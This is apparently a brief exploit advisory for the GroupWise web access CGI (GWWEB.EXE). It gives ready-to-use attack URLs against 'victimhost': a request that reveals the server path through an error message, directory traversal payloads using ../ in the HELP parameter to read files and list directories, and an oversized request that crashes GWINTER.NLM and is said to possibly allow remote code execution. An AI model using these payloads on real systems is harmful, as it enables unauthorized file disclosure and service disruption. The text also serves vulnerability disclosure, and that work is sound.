Exploit:

 Requesting the following URL from the GroupWise server
 
http ://victimhost/cgi-bin/GW5/GWWEB.EXE?HELP=asdf

 will return the error message:

Could not read file SYS:WEB\CGI-BIN\GW5\US\HTML3\HELP\ASDF.HTM
revealing the full path of the GroupWise server software.
Note: The URL above may need to be tailored to the target system.

To read .htm files anywhere on the server, or to browse directories,
use HELP and the ../ string to traverse directories, for example:

http ://victimhost/cgi-bin/GW5/GWWEB.EXE?HELP=../../../secret.htm
or
http ://victimhost/cgi-bin/GW5/GWWEB.EXE?HELP=../../../

Again, the paths shown above may need to be modified.
To abend GWINTER.NLM request a URL like:

http ://victimhost/cgi-bin/GW5/GWWEB.EXE?[512+ chars]

It may be possible to remotely execute arbitrary code via this buffer
overflow.